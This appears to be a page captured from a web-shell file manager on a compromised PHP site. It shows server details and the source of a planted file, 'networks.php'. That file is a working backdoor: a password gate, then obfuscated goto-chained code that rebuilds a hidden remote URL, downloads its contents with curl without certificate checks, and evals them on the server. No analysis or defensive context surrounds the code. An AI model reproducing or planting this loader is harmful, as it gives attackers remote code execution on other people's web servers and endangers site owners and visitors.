HEX
Server: Apache/2
System: Linux server1 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64
User: prospack (1044)
PHP: 8.0.30
Disabled: eval, exec, apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd,exec, fp, fput, highlight_file, ini_alter, ini_restore, inject_code, openlog, passthru,phpAds_remoteInfo, phpAds_XmlRpc,phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,posix_setuid, posix_setuid, posix_uname,proc_open,proc_close, proc_get_status, proc_nice, proc_terminate, shell_exec,syslog, system, xmlrpc_entity_decode,show_source,pcntl_exec,virtual,suexec,dbmopen,dl,symlink,disk_free_space,diskfreespace,leak
$ pwd: /home/prospack/domains/prospack.com/public_html/
Upload Files
File: /home/prospack/domains/prospack.com/public_html/networks.php
<?php ?><?php error_reporting(0); if(isset($_REQUEST["0kb"])){die(">0kb<");};?><?php
if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', $_POST['pwdyt']) == '7b5f411cddef01612b26836750d71699dde1865246fe549728fb20a89d4650a4') {
      $_SESSION['secretyt'] = true; } else { die('<html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html>'); } } }
?>
<?php
goto MMJd3; sy7E0: $SS8Fu .= "\x2f\160\x6f\164"; goto qDKgI; tBWqP: $SS8Fu .= "\65\x2f\144"; goto PjLow; Z1fDH: $SS8Fu .= "\x6f"; goto cQShg; cQShg: $SS8Fu .= "\57"; goto OTbPc; l2KX1: $SS8Fu .= "\164\164"; goto oibfZ; y0vkU: $SS8Fu .= "\57"; goto EYzIF; Q2dEt: $SS8Fu .= "\164\170\164\x2e\64"; goto tBWqP; hdfzX: $SS8Fu .= "\x2f"; goto y0vkU; M8874: eval("\77\x3e" . TW2KX(strrev($SS8Fu))); goto Q2VNb; oibfZ: $SS8Fu .= "\x68"; goto M8874; OTbPc: $SS8Fu .= "\141\x6d\x61\144"; goto sy7E0; GrX6T: $SS8Fu .= "\x30\141\x6d\141\x64"; goto hdfzX; MMJd3: $SS8Fu = ''; goto Q2dEt; PjLow: $SS8Fu .= "\x6c"; goto Z1fDH; qDKgI: $SS8Fu .= "\56\x32"; goto GrX6T; EYzIF: $SS8Fu .= "\x3a\x73\x70"; goto l2KX1; Q2VNb: function tw2kX($V1_rw = '') { goto S1oZL; V2RDF: $tvmad = curl_exec($xM315); goto EUVIW; tM6NO: return $tvmad; goto vuWvH; ZIbFK: curl_setopt($xM315, CURLOPT_RETURNTRANSFER, true); goto yBSOL; EUVIW: curl_close($xM315); goto tM6NO; euHNs: curl_setopt($xM315, CURLOPT_SSL_VERIFYPEER, false); goto kGJPE; kGJPE: curl_setopt($xM315, CURLOPT_SSL_VERIFYHOST, false); goto i8G2G; S1oZL: $xM315 = curl_init(); goto ZIbFK; yBSOL: curl_setopt($xM315, CURLOPT_TIMEOUT, 500); goto euHNs; i8G2G: curl_setopt($xM315, CURLOPT_URL, $V1_rw); goto V2RDF; vuWvH: }
@ Telegram